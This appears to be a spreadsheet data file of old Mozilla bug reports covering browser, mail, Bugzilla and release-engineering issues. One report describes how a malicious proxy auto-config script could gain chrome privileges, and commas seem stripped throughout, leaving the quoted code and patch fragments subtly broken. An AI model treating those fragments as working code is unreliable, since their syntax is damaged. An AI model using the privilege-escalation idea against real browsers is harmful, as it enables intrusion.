and expects it to be of type nsIScriptContext should first check that the option
bit JSOPTION_PRIVATE_IS_NSISUPPORTS is set in the context and then get the
nsISupports private data and QI to nsIScriptContext to be sure the private data
really is of type nsIScriptContext.</t>
  </si>
  <si>
    <t>DEVTOOLS-590621</t>
  </si>
  <si>
    <t>Console panels feature a confusing control</t>
  </si>
  <si>
    <t>Created attachment 469125
Screenshot of the offending control
When you open a panel in the console (such as the property viewer) it has a confusing control that does not have any labeling and doesn't seem to do anything useful. This should be eliminated.
(Worst case scenario would be adding a string to at least have a label next to the checkbox but much better is for the control to go away)</t>
  </si>
  <si>
    <t>TOOLKIT-489030</t>
  </si>
  <si>
    <t>Rename mozStorageValueArray.* to mozStorageArgValueArray.*</t>
  </si>
  <si>
    <t>It'll better reflect the only class that is (now) in the file.  Also let's update it to follow the style guidelines too!</t>
  </si>
  <si>
    <t>SEAMONKEY-368698</t>
  </si>
  <si>
    <t>Preference appearance startup does not allow Mail and News Groups as preference</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.2pre) Gecko/20070111 SeaMonkey/1.1
Build Identifier: Sea Monkey 1.1
After choosing Mail and News Groups as Preference for Appearance Startup I expected to enter SeaMonkey in Mail and News Groups.  It worked for about 3 startups then went back to starting in Navigator.  I have tried reselecting the preference but can no longer get SeaMonkey to start in Mail and News Groups instead of Navigator.  (I prefer to check email before going to Navigator).  Thank you
Reproducible: Always
Steps to Reproduce:
1.Select Edit &gt; Preference in Mail and Newsgroups or Navigator
2.Click Appearance &gt; and check Mail and News Groups under When SeaMonkey starts up open:
3.3 times SeaMonkey started up in Mail and News Groups.  
Actual Results:  
After 3 starts it defaulted back to starting up in Navigatof
Expected Results:  
SeaMonkey starts up in Mail and News Groups instead of Navigator
Software should have retained the selected Appearance Preference</t>
  </si>
  <si>
    <t>preferences</t>
  </si>
  <si>
    <t>dihartman</t>
  </si>
  <si>
    <t>WEBSITES_GRAVEYARD-710888</t>
  </si>
  <si>
    <t>blog.mozilla.org</t>
  </si>
  <si>
    <t>Add meta tags into individual posts on The Den for sharing</t>
  </si>
  <si>
    <t>We need to make sure that when we share an individual post from the Den that the meta data for the individual post shows up rather than the meta data for the whole blog Ie: instead of The Den - a cozy corner of the web just for you it would say The Den - 10 reasons to upgrade your Firefox. 
There's a plug in that does this but it's 3rd party and would have to go through infrasec. 
Craig - you said you'd look into a work around for this and get back to us on Monday. Thanks for checking on it.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-274254</t>
  </si>
  <si>
    <t>nvidia.com - drop-down menu covered by flash image</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 zh-TW rv:1.7.5) Gecko/20041119 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 zh-TW rv:1.7.5) Gecko/20041119 Firefox/1.0
In nVidia's home page : www.nvidia.com/page/home  try click the drop-down menu
labelled All Products (beside the image of International Site). The drop-down
menu appears but part of it is covered by the flash image below the drop-down
menu. In IE the drop-down menu covers the flash.
Reloading the page does not help the appearance of the drop-down menu.
Reproducible: Always
Steps to Reproduce:
1.go to http://www.nvidia.com/page/home
2.click the drop-down menu labelled All Products (beside the image of
International Site)
Actual Results:  
The drop-down menu appears but part of it is covered by the flash image below
Expected Results:  
the drop-down menu should cover the flash but not vice versa.
i am using the Firefox default theme but i don't think it is relevant though.</t>
  </si>
  <si>
    <t>geoffrey_mak</t>
  </si>
  <si>
    <t>CORE-231870</t>
  </si>
  <si>
    <t>instanceof Event (well any dom object) is broken - throws instead of returning false</t>
  </si>
  <si>
    <t>Steps:
1. start writing something which is supposed to analyze objects and write:
function analyze(o){
if (o instanceof Event){
return something
}
return o
}
/*then call it*/
analyze(testcase)
expected result:
analyze returns test (actual code is slightly more complicated)
actual result:
Error: uncaught exception: null
another example from venkman:
0001: String instanceof Node
Caught exception: â€œnullâ€
--
 just file a bug
 nah none of the primitives work
 eww not even [] or {} work
 timeless: does it happen with other DOM classes?
 well it seems to do the same with Node
 any one
 and element
 you can do (dom object) instanceof (dom type)
 so it's in my hasinstance code
 file it in DOM Other or whatever
 assign it directly to me</t>
  </si>
  <si>
    <t>SUPPORT.MOZILLA.ORG-422952</t>
  </si>
  <si>
    <t>Changing settings on tiki-listpages.php does not update the URI</t>
  </si>
  <si>
    <t>Go to .
Set a parameter (language category rows).
The page is updated. The URI isn't.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-91411</t>
  </si>
  <si>
    <t>eastbaytruckcenter.com - East Bay Truck site displays ok in 4.7x nothing in Mozilla</t>
  </si>
  <si>
    <t>Platform: PowerBook G3/300/192Mb/25Gb MacOS X 10.0.4
Fizzilla Build: 2001071305
This webpage displays blank in Mozilla
http://www.eastbaytruckcenter.com/
but viewing source shows that there is some JavaScript that isn't executing and
it works fine in Communicator 4.76. A friend on Win98 &amp; Moz milestone 0.9.2
build sent me this one so it's obviously a problem there too. This may be
all/all. If someone can mention Linux that would be great.
I have a feeling there's going to be lots of FrontPage-built broken JavaScript
pages out there...
- Adam</t>
  </si>
  <si>
    <t>CLOUD_SERVICES-475572</t>
  </si>
  <si>
    <t>Server: Sync</t>
  </si>
  <si>
    <t>Master bug for tracking the first cluster launch</t>
  </si>
  <si>
    <t>Creating a container bug to track all the dependencies for getting the first cluster up and running</t>
  </si>
  <si>
    <t>CORE-178861</t>
  </si>
  <si>
    <t>lockup on select from right to left on a remote 8bit truecolor X server</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i386en-US rv:1.1) Gecko/20020827
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.2b) Gecko/20021105
on the url i tried to select with the mouse from right to left the HP
Deskjet 1220 C link for a copy&amp;paste (i do not click on the link)
when i reach the middle of the deskject work mozilla will lockup the WM can
move the windows but inside i only get the ghost image of what was there before
all mozilla windows are locked cant create any more (the -remote waits forever)
in the server computer mozilla is running using 0% of CPU kill -TERM have no
effect i have to kill -KILL it
using a local mozilla have no problem
the PC running the mozilla 11/05/2002 mightly build  is a ix86 with slackware linux
the X server is a suse 7.3 on a sun ultra1 running with 8bit truecolor (i run
out of colors in other apps in pseudocolor and gtk apps dont run in static colors))
Reproducible: Always
Steps to Reproduce:
1. open the url
2. select hp deskject 1220 C from right to left starting near the C
3.near the middle of the deskjet mozilla locks up</t>
  </si>
  <si>
    <t>CORE-385607</t>
  </si>
  <si>
    <t>Whitespace is not collapsed across  boundaries in dynamic testcase</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Macintosh U Intel Mac OS X en-US rv:1.9a6pre) Gecko/20070622 Minefield/3.0a6pre
Loading the testcase should give x x not x  x.</t>
  </si>
  <si>
    <t>CORE-334537</t>
  </si>
  <si>
    <t>nsMenuBarX.mm installs an event handler poorly</t>
  </si>
  <si>
    <t>I didn't think this was worth its own bug but I can't find Josh right now.
In nsMenuBarX.mm nsMenuBarX::InstallCommandEventHandler():
     const EventTypeSpec commandEventList[] = {{kEventClassCommand kEventComma
ndProcess}}
     err = ::InstallWindowEventHandler(myWindowRef sCommandEventHandler 2 co
mmandEventList this NULL)
There's only one event type in the list so the third argument to InstallWindowEventHandler should be 1.  Better yet it should be GetEventTypeCount.
Also included in the patch: elimination of an unnecessary switch.</t>
  </si>
  <si>
    <t>BUGZILLA-303914</t>
  </si>
  <si>
    <t>legal_bugs_status should be spelled legal_bug_status in Bug.pm</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 5.5 Windows NT 5.0 MRA 4.1 (build 00975) .NET CLR 1.0.3705)
Build Identifier: Bugzilla/2.18.3
In the file Bugzilla/Bug.pm in the sub choices() the hash $self-&gt;{choices}-&gt;
{bug_status} is set to the keyword @::legal_bugs_status which is a misspelling 
and should be corrected to be @::legal_bug_status.
Reproducible: Always
Steps to Reproduce:
1. See the details for the location of this bug</t>
  </si>
  <si>
    <t>ryan.gorsuch</t>
  </si>
  <si>
    <t>CALENDAR-454998</t>
  </si>
  <si>
    <t>[CalDAV] free/busy lookups don't work</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.0.1) Gecko/2008070206 Firefox/3.0.1
Build Identifier: 2008091118
As you all know bug 452610 made CalDAV-sched an user settable option disabled by default.  The problem is that means free/busy lookups are now disabled by default.  This results in a loss of critical functionality.
If we  leave the default setting we no longer get free/busy lookups.  This is something that worked in the previous release (0.8)
OTOH we get free/busy lookups if we enable the caldav scheduling option but we lose the ability to send invitations.  This is because the e-mail invitation is no longer generated and the caldav-sched invitation is not functional for our server (Bedework 3.4.1.1).
I consider this to be a regression since a critical feature (free/busy lookups) is no longer available.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>bleathem</t>
  </si>
  <si>
    <t>FIREFOX-243091</t>
  </si>
  <si>
    <t>Don't distribute communicator/navigator/mailnews/editor cruft in classic.jar/comm.jar</t>
  </si>
  <si>
    <t>When we build in xpfe/communicator xpfe/components and themes/classic we
inadvertedly package a bunch of stuff we don't need adding at least 300KB
compressed to the download size.
Almost none of this is required by our app so here's a patch to turn it all
off. If we discover any problems they can be identified and fixed.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-372342</t>
  </si>
  <si>
    <t>Bonsai diffs are broken for some check-ins</t>
  </si>
  <si>
    <t>I realize that Bonsai diffs do now show up for check-ins that were made during the last 15 minutes but this issue is different.
Steps to reproduce:
1. Go to http://bonsai.mozilla.org/cvsquery.cgi?treeid=default&amp;module=all&amp;branch=HEAD&amp;branchtype=match&amp;dir=&amp;file=&amp;filetype=match&amp;who=&amp;whotype=match&amp;sortby=Date&amp;hours=2&amp;date=explicit&amp;mindate=2007-03-01+00%3A00&amp;maxdate=2007-03-01+23%3A59&amp;cvsroot=%2Fcvsroot
2. Click on the 1.120 link after the check-in to 	mozilla/extensions/irc/xul/content/commands.js.
I get taken to the diff page but no diff is shown. The same thing happens with other diffs on the page: e.g. bz's check-in to nsRange.cpp.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-727091</t>
  </si>
  <si>
    <t>Need a new charger cable for my Asus Transformer tablet</t>
  </si>
  <si>
    <t>The one that came with it seems to have a loose connection in it and it will only charge if I sit there and wiggle it.  Do you guys have a spare or should I order one myself?</t>
  </si>
  <si>
    <t>pdang</t>
  </si>
  <si>
    <t>CORE-120373</t>
  </si>
  <si>
    <t>[FIX]nsIScriptSecurityManager::CheckLoadURI isn't scalable to new protocols</t>
  </si>
  <si>
    <t>If we're going to dream about pipes i have some:
3. be able to add new protocols (wgate needs this) w/o rebuilding this file or
maintaining a patch to it.
2. adding logic to 868-874 that blocked http https and ftp would satisfy some
people's wishes that we not load any content from the network while reading
mail. The trick is to do that cleanly #1 would allow that as would some variant.
1. be able to add protocols to the blacklist and whitelist using prefs.js
Bonus points aim wouldn't have to be listed in this file (aim shouldn't be here
for the same reasons that wgate's protocol doesn't belong here). And https could
be moved out of this file.
So ... instead of doing what we're doing now could the protocol handlers
themselves report whether they're safe to the security manager so that the
security manager wouldn't have to hard code the list at all?</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-319445</t>
  </si>
  <si>
    <t>Please remove bart from certificates@mozilla.org</t>
  </si>
  <si>
    <t>One person has reported that they got an error when sending to certificates@mozilla.org based on trying to send to a non-existent local address bart (presumably Bart Decrem). Could someone take a look at this and please remove bart from the list of addresses to which certificates@mozilla.org email is forwarded? Thanks!</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-732543</t>
  </si>
  <si>
    <t>signmar eats CPUs for breakfast if mar passphrase isn't correct when signing server starts up</t>
  </si>
  <si>
    <t>When starting the signing server it asks you to enter the gpg signcode and mar passphrases and then verifies that it can sign test files before actually starting the https service.
If the mar passphrase isn't entered correctly the signing server will exit but the signmar process keeps running in the background at 100% CPU. Presumably it's still trying to read the password.
We should make sure that signmar is killed off properly in this case.
(brian - is it worthwhile looking into why signmar behaves like this)</t>
  </si>
  <si>
    <t>CORE-304033</t>
  </si>
  <si>
    <t>Useless setTimeout calls should warn not throw</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8b4) Gecko/20050809 Firefox/1.0+
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8b4) Gecko/20050809 Firefox/1.0+
DOM events don't get stopped with stopPropagation() when there is a setTimeout()
with a closure in the event handling function.
i've specially prepared this page to show the problem:
http://wh.ysagoon.com/diz/tmp/event3.php
and here's a page showing how it should work the setTimeout has been replaced
by an alert to show the event propagation:
http://wh.ysagoon.com/diz/tmp/event4.php
Reproducible: Always</t>
  </si>
  <si>
    <t>diz</t>
  </si>
  <si>
    <t>THUNDERBIRD-261187</t>
  </si>
  <si>
    <t>Background image colors of mail persist to next composed message</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7) Gecko/20040803 Firefox/0.9.3
Build Identifier: Thunderbird 0.8  (20040913)
If one composes a new mail and specifies a background image (with format/page
setting/background image) and then closes the new mail (or sends it doesnt
matter...) then this background image will also be used on the next mail one
composes. 
The text colors/background color etc are reset to what one specified for new
mails in the settings/compose/new html mail - but the background image remains
until one removes the entry with format/page setting/background image. OR if one
restarts Thunderbird. 
Reproducible: Always
Steps to Reproduce:
1.Press compose
2. Dont enter any mail text subject or recipient - just click in the the
message window
3. Select format/page setting/background image and choose a jpeg image
4. Image is displayed in the background
5. Close the compose window without saving or sending the mail
6. Press compose - the background from the last mail is still used
Actual Results:  
The background from the last mail is used until one specifies a new one or
restarts thunderbird
Expected Results:  
New mail should not have a background image - or (new feature :-) there should
be a default image that is specified under settings/compose/new html mail.</t>
  </si>
  <si>
    <t>ki</t>
  </si>
  <si>
    <t>CORE-321101</t>
  </si>
  <si>
    <t>Malicious PAC script can escalate privilege</t>
  </si>
  <si>
    <t>On Firefox 1.0.7 and Mozilla 1.7.12:
Within the function FindProxyForURL |this| refers to the nsProxyAutoConfig
component's compilation scope that is a BackstagePass object.  Thus a PAC
script can run arbitrary code with chrome privileges by using privileged
functions in the BackstagePass.
On Firefox 1.5 and trunk:
Within the function FindProxyForURL |this| refers to the nsProxyAutoConfig
object.  Thus a PAC script can run arbitrary code with chrome privileges by
using privileged functions of the nsProxyAutoConfig object.
Note: Even if |this| issue is fixed a PAC script can still use valueOf.call
trick (Bug 312871) to access the BackstagePass and run arbitrary code.
Steps to Reproduce:
1. Setup a PAC file testcase on web server or save it to local hard disk.
2. Set Automatic proxy configuration URL to its URL.
3. Open any web site.
An alert dialog that shows Components.stack will appear.</t>
  </si>
  <si>
    <t>CORE-161042</t>
  </si>
  <si>
    <t xml:space="preserve">td.align is left even if in </t>
  </si>
  <si>
    <t>For the following code:
foo
td.align is left even though the text in the td is centered.  td.align should
be center or the empty string.  IE makes td.align be the empty string. 
Setting td.align to left makes the text in the cell become aligned left which
is even more strange.
I ran into this bug while writing the transpose tables bookmarklet for
http://www.squarefree.com/bookmarklets/pagedata.html.  I want to copy the align
attribute from trs to tds when the tds don't have the align attribute (like I do
for bgColor) but because of this bug I can't tell whether a td has the align
attribute.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-413701</t>
  </si>
  <si>
    <t>Extension without file pending in nomination queue</t>
  </si>
  <si>
    <t>1. Go to https://addons.mozilla.org/en-US/firefox/editors/review/39503
Actual result: No file is attached but the file is pending for public.
Notice: The extension (with this version number) exists twice in the nomination queue.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-523982</t>
  </si>
  <si>
    <t>Somebody is playing us for chumps</t>
  </si>
  <si>
    <t>Created attachment 407891
screenshot
The most shared add-ons list shouldn't display disabled add-ons</t>
  </si>
  <si>
    <t>MOZILLA.ORG-253019</t>
  </si>
  <si>
    <t>CVS account for Mats Palmgren</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-452670</t>
  </si>
  <si>
    <t>MDC login broken</t>
  </si>
  <si>
    <t>Looks like the site is having a sync problem again I can log in sometimes but then when I click on something it says I'm not logged in. Plus sometimes I'm not getting the right skin.  Can someone check to be sure the two servers have their settings in sync and do a restart if needed?
This started when I was trying to change the site name from Mozilla Developer Center to MDC in order to shorten the page titles (and make Google searches on mdc + whatever work).</t>
  </si>
  <si>
    <t>CORE-245497</t>
  </si>
  <si>
    <t>statusbar displayed wrong (not obeying gtk theme)</t>
  </si>
  <si>
    <t>I'm using the gtk theme smokey blue
(gtk 2.4 gnome 2.6)
mozilla shows a grey status bar instead of a blueish one that other gtk apps show.
attaching a screenshot in a second.</t>
  </si>
  <si>
    <t>SEAMONKEY-337920</t>
  </si>
  <si>
    <t>rename mozilla.in to seamonkey.in</t>
  </si>
  <si>
    <t>------- Comment #6 From Robert Kaiser 2006-05-14 04:21 PDT [reply] -------
Argh this should have been seamonkey.in instead of mozilla.in we're renaming
those files while moving (that is we're doing this for the others but you
didn't...)
---------------------------------
Are we hardcoding seamonkey in the Makefiles or keeping MOZ_APP_NAME?  Should I hardcode seamonkey-bin and SeaMonkey in the script?</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-386070</t>
  </si>
  <si>
    <t>http referer field not set for submission</t>
  </si>
  <si>
    <t>A user brought up the idea that we should set the referer field in the http header when we do our xml submissions.  Talking to mkaply it is common for HTML forms to set the referer field when those forms are submitted.  So we should probably do the same.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-306177</t>
  </si>
  <si>
    <t>Default plugin Click to get the plugin no longer works</t>
  </si>
  <si>
    <t>When a plugin is missing we show the default plugin which displays Click here
to get the plugin. If you click it nothing happens.
I think the new plugin-related popup blocking stuff is breaking this. We
probably need to add some code to the default plugin to allow it to pop up a window.
This might also affect FF.</t>
  </si>
  <si>
    <t>CORE-217124</t>
  </si>
  <si>
    <t>nsEventListenerManager::HandleEvent is unnecessarily bloated</t>
  </si>
  <si>
    <t>nsEventListenerManager::HandleEvent() contains a lot of redundant code for
dealing with different event types in the same way.  We can replace the mass of
code with some const data containing the mapping of event messages to methods on
the nsIDOM*Listener interfaces.</t>
  </si>
  <si>
    <t>BUGZILLA-469794</t>
  </si>
  <si>
    <t>On windows export bug list to CSV breaks because of extra line breaks</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4
Build Identifier: Bugzilla 3.2
When exporting a buglist to CSV in Windows 2k3 (ActiveState 5.10 build 1004) I get one extra line break for every loop/check (FOR EACH IF) in template list.csv. So every bug takes 3/4 lines per column exported!
This was not happening when using Bugzilla 3.0 and Active State 5.8.8 build 822. Is this a known issue of TT or other module?
To fix I had to remove all line breaks and make conditions happen on one line:
[% FOREACH bug = bugs %]
[% bug.bug_id %][% FOREACH column = displaycolumns %][% colsepchar %][% IF column == opendate OR column == changeddate %][% rawcolumn = column.replace(date time) %][% bug.$column = date.format(bug.$rawcolumn %Y-%m-%d %H:%M:%S) %][% ELSIF column == 'bug_status' %][% bug.$column = get_status(bug.$column) %][% ELSIF column == 'resolution' %][%- bug.$column = get_resolution(bug.$column) %][% END %][% bug.$column FILTER csv %][% END %][% END %]
Reproducible: Always
Steps to Reproduce:
1. Create a search
2. Click on CSV to export bug list as CSV
3.
Actual Results:  
For each bug a column is display every 3 lines.
Expected Results:  
Columns should be displaying next to each other no below each other.</t>
  </si>
  <si>
    <t>ycombarnous</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-509670</t>
  </si>
  <si>
    <t>Safebrowsing favicon is distorted</t>
  </si>
  <si>
    <t>Created attachment 393731
screenshot
The favicon for the safebrowsing overlay page -as displayed in the locationbar- is distorted. The source image (popup_blocked_icon.tiff) displays a circle of 14px by 14px in the locationbar the image is displayed as a circle of 15px by 15px.
It displays correctly on the tab bar (see attached screenshot). Also visible in attachment (id=392880) (WIP v2 in bug 480207).
On the safebrowsing warning bar it also displays incorrectly (and on the popup blocking barâ€¦).
tested with 2.0b4pre (1.9.0.14pre 2009081100) - and some 2.1a tinderbox builds
some Pixie pixel-counting:
http://dev.l-c-n.com/camino/sf_browsing/favicon-tabbar.png
http://dev.l-c-n.com/camino/sf_browsing/favicon-urlbar.png
http://dev.l-c-n.com/camino/sf_browsing/popupblocker.png
http://dev.l-c-n.com/camino/sf_browsing/warningbar.png</t>
  </si>
  <si>
    <t>SUPPORT.MOZILLA.ORG-438696</t>
  </si>
  <si>
    <t>Search Index Insert is flooding the database</t>
  </si>
  <si>
    <t>I am seeing the following query happen about 300 times/s in production which is flooding the database.
insert into `tiki_searchindex` (`location``page``searchword``count``last_update`) VALUES (?) 
We need to take it out before we can put the master/slave patch back in production.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-489271</t>
  </si>
  <si>
    <t>Please QA and Sign the Personas Partner Repack (3.0.9)</t>
  </si>
  <si>
    <t>Please start the QA review process on the 3.0.9 version of the Personas partner distribution of Firefox.
The repack worksheet is located at:
https://wiki.mozilla.org/Partnering:Repacks:Firefox3:Personas
3.0.9 installers are available from their respective locale directories at:
https://people.mozilla.com/files/partners/personas/3.0.9/
Please note that the installers until QA'd and digitally signed are password protected. Distributions will be publicly available once they are QA'd and signed. Please contact me if there are any questions related to this distribution.
Thanks much
kev</t>
  </si>
  <si>
    <t>FIREFOX_FOR_ANDROID_GRAVEYARD-485962</t>
  </si>
  <si>
    <t>Panning/Zooming</t>
  </si>
  <si>
    <t>Kinetic scrolling was disabled with lock-panning patch</t>
  </si>
  <si>
    <t>Created attachment 370039
add back the missing variables
The change that pulled KineticData into its own data structure accidentally left out initialization of a few variables.  The patch restores them.</t>
  </si>
  <si>
    <t>ben.combee</t>
  </si>
  <si>
    <t>CORE-492299</t>
  </si>
  <si>
    <t>xptcall for e500(booke)</t>
  </si>
  <si>
    <t>I couldn't search a dependent code for e500 that is based on a PowerPC architecture but doesn't have FPU. This may be useful if there is not yet the code.</t>
  </si>
  <si>
    <t>CORE-162083</t>
  </si>
  <si>
    <t>control-delete deletes to end-of-line instead of end-of-word</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.0.0) Gecko/20020607
BuildID:    2002060700
In for example textareas pressing ctrl-delete deletes from the cursor to end
of line.  I assume it should instead delete to the end of the next word (as
Windows does and to be consistent with control-left control-right and
control-backspace).
Reproducible: Always
Steps to Reproduce:
1. Go to additional comments textarea for this bug
2. Type 
     abc def ghi
     jkl mno pqr
3. Put cursor before d
4. Press ctrl-delete
Actual Results:  def ghi is erased
Expected Results:  should have erased just def</t>
  </si>
  <si>
    <t>dkindred+mozilla</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-482644</t>
  </si>
  <si>
    <t>Final staging tasks for mercurial release automation</t>
  </si>
  <si>
    <t>We need to generate MD5SUMS and SHA1SUMS verify locales are all present add a copy of the GPG KEY file setup contrib dirs fix permissions &amp; ownership etc - basically all the stuff in Bootstrap's Stage except the file grooming. I suspect most of this can be done after signing and uploaded with that plus a few ssh's to fix up ownership and permissions. Has the advantage of not needing shell access on the staging server which may go away in the future but we could also go the post_upload route.</t>
  </si>
  <si>
    <t>CORE-666200</t>
  </si>
  <si>
    <t>support select.add(element long before)</t>
  </si>
  <si>
    <t>We don't support select.add(element long before) yet.</t>
  </si>
  <si>
    <t>CORE-116777</t>
  </si>
  <si>
    <t>hotizontal scrolling required with default browser size (not required in IE5.5 Netscape 4.79)</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Win98 en-US rv:0.9.7) Gecko/20011221
BuildID:    2001122106
When the above URL is viewed in Mozilla 0.9.7 the width of the page is
larger than the default widtch of the browser window with the result
that horizontal scrollbars appear. This does not happen with IE5.5 or
Netscape 4.79. It is a pain to scroll the window horizontally to view the
entire content.
If I increase the size of the browser window there is a cutoff point reached
where the page layout width becomes equal/less than the browser window width
and the horizontal scrollbars disappear.
Note that this did not used to happen with some earlier Mozilla
builds (I'm not sure of the version where I first noticed this but
it could have been 0.9.5 or later).
Reproducible: Always
Steps to Reproduce:
1. Go to above URL
2.
3.
Actual Results:  Horizontal scrollbars appear.
Expected Results:  They shouldn't appear? Unfortunately I'm not sure how to
dissect the page to find out if it's a bug in Mozilla or that bad HTML on that
page is being interpreted wrongly (from a standards point of view) by
IE/Netscape.</t>
  </si>
  <si>
    <t>blahno1</t>
  </si>
  <si>
    <t>SEAMONKEY-484484</t>
  </si>
  <si>
    <t>Upgrade MailNews smileys (emoticons)</t>
  </si>
  <si>
    <t>Created attachment 368607
Concept of how to map Chatzilla icons
Our current mailnews smileys (both mail display and mail composition) are rather out of sync with the general smoothness of our themes.
Furthermore they're 19x19 gifs which causes more problems:
- size breaks Mac Tiger menuitems (bug 483888)
- gif lacks some features png has (bug 199958)
We do otoh already ship a decent set of 16x16 png smileys as part of Chatzilla.
Thus I propose to just copy over the limited subset we do use in MailNews.
Unfortunately MailNews does not recognise most of Chatzilla's icons nor does Chatzilla recognise some of the MailNews' ones. The attached concept proposes how to map the known ones I could derive those missing from the existing Chatzilla ones if we agree on this path of action here (and I'd provide the actual CSS patch then).
But first we need to know for sure if the Chatzilla icons are MPLed thus requesting r? from James. Requesting ui-r? and sr? for the path of action real patch will follow after that. 
(BTW: I'd propose using a single image map for the smileys and using -moz-image-region if Mac menuitems understand that.)
(Sadly we can't do 'hg copy' anyway since Chatzilla is not in hg yet.)</t>
  </si>
  <si>
    <t>BUGZILLA-315129</t>
  </si>
  <si>
    <t>[PostgreSQL] Attachments are sorted by last changed time instead of creation time</t>
  </si>
  <si>
    <t>1) create attachment 1
2) create attachment 2
=&gt; in show_bug.cgi you see attachment 1 and attachment 2 below attachment 1 as expected (they are displayed in chronological order)
3) edit attachment 1 (no need to change anything or change a flag or do what you want)
4) apply changes
=&gt; now attachment 2 is displayed first and attachment 1 is now below attachment 2. Oops!!
It appears that attachments are sorted by their last changed time instead of their creation time. Very annoying!</t>
  </si>
  <si>
    <t>NSS-200224</t>
  </si>
  <si>
    <t>certutil crashes when verifying cert chain with bad slot name</t>
  </si>
  <si>
    <t>The command 
certutil -V -d dbdir -h Root Certs -n alertqa -u C -e
crashes with a null dereference.
The problem is that there is no slot named Root Certs so the slot pointer
is NULL.  the -e option causes certutil to attempt to authenticate on that 
slot and it crashes.  
This patch stops the crash although it may not be the best solution:
Index: certutil.c
===================================================================
RCS file: /cvsroot/mozilla/security/nss/cmd/certutil/certutil.cv
retrieving revision 1.74
diff -u -r1.74 certutil.c
--- certutil.c  4 Mar 2003 23:11:09 -0000       1.74
+++ certutil.c  2 Apr 2003 04:33:46 -0000
@@ -27197 +27197 @@
     if (certutil.commands[cmd_CheckCertValidity].activated) {
        /* XXX temporary hack for fips - must log in to get priv key */
        if (certutil.options[opt_VerifySig].activated) {
-           if (PK11_NeedLogin(slot))
+           if (slot &amp;&amp; PK11_NeedLogin(slot))
                PK11_Authenticate(slot PR_TRUE 
        }
        rv = ValidateCert(certHandle name</t>
  </si>
  <si>
    <t>CORE-347174</t>
  </si>
  <si>
    <t>Implement document.readystate == complete</t>
  </si>
  <si>
    <t>On IE we know if the onLoad event has already been triggered however on Firefox/Mozilla we don't know. Therefore we can set up our code in an iframe to handle the onLoad event for the parent frame after onLoad has been triggered rendering the event handler useless. However publisher specifications often require the onLoad event to be triggered prior to doing certain things. Cases where this arise is where content is loaded in an iframe that must wait until the onLoad event on the parent document is triggered. This issue would be solved by creating the equivalent of IE's document.readystate == complete flag in Mozilla core.</t>
  </si>
  <si>
    <t>TESTING_GRAVEYARD-466606</t>
  </si>
  <si>
    <t>JavaScript Tests - Do not force language version upon non-Gecko browsers</t>
  </si>
  <si>
    <t>bug 458223 introduced the automatic selection of the javascript version of tests so that it was no longer necessary to invoke the particular language version for the js test suites e.g. type/javascriptversion=1.8 for the js1_8 suite. This broke non-Gecko browsers such as Internet Explorer which do not support mime type versioning.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-491298</t>
  </si>
  <si>
    <t>Rename win32 slaves so they can work with OPSI</t>
  </si>
  <si>
    <t>Last quarter bhearsum discovered that OPSI requires the win32 slaves to be using netbios-compatible names (ie 15char limit). As experiment he used the following format going from:
moz2-win32-slave03.b.m.o
...to:
win32-slave03.b.m.o
1) Does this format seem ok to everyone? Want to make sure we are ok with this before we start renaming all win32 slaves. 
2) Assuming we want to keep try slaves in different pool what naming convention should we use for them? 
3) This requires changes to buildbot-master which can be tracked here also. 
4) This required changes to DNS which should be tracked in a separate dep.bug.
5) While this change is caused by OPSI on win32 it seems reasonable to do the same for slaves on all other platform also. If people agree I can file separate bugs for that.
Anything else?</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS_GRAVEYARD-439349</t>
  </si>
  <si>
    <t>Wrong handling of newline escape sequences</t>
  </si>
  <si>
    <t>As reported in bug #437405 MozillaTranslator doesn't properly handles escape sequences (\r \n \t) in Properties and INI files. This must be solved.</t>
  </si>
  <si>
    <t>TOOLKIT-384837</t>
  </si>
  <si>
    <t>Remove unused functions forEachEntry getItemsWithFlagUnset and getStagedLeafName</t>
  </si>
  <si>
    <t>Created attachment 268734
remove forEachEntry getItemsWithFlagUnset and getStagedLeafName
forEachEntry was added in bug 293548 removed in bug 284515.
